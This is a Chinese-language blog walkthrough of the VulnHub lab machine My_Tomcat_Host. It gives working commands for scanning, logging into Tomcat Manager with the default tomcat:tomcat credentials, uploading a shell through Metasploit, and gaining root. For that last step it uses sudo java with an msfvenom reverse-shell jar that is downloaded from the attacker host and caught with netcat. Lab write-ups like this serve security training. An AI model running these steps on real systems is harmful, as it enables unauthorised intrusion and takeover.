vulnhub:My_Tomcat_Host靶机

kali:192.168.111.111

靶机:192.168.111.171

信息收集

端口扫描

nmap -A -v -sV -T5 -p- --script=http-enum 192.168.111.171

image

访问8080端口

image

尝试弱口令tomcat:tomcat登录后台

image

使用msf模块exploit(multi/http/tomcat_mgr_upload)上传shell

set rhosts 192.168.111.171
set rport 8080
set httpusername tomcat
set httppassword tomcat
run

image

提权

sudo -l

发现可以执行java

image

msfvenom生成java反弹shell

msfvenom -p java/shell_reverse_tcp lhost=192.168.111.111 lport=5555 -f jar -o shell.jar

image

本地使用python开启http服务,目标wget下载生成的jar文件

python3 -m http.server
wget http://192.168.111.111:8000/shell.jar

image

nc本地侦听端口后,执行上传的反弹shell

nc -lvp 5555

sudo -u root /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.242.b08-0.el7_7.x86_64/jre/bin/java -jar shell.jar

获得flag

image

posted @ 2023-02-01 16:56  ctostm  阅读(32)  评论(0)    收藏  举报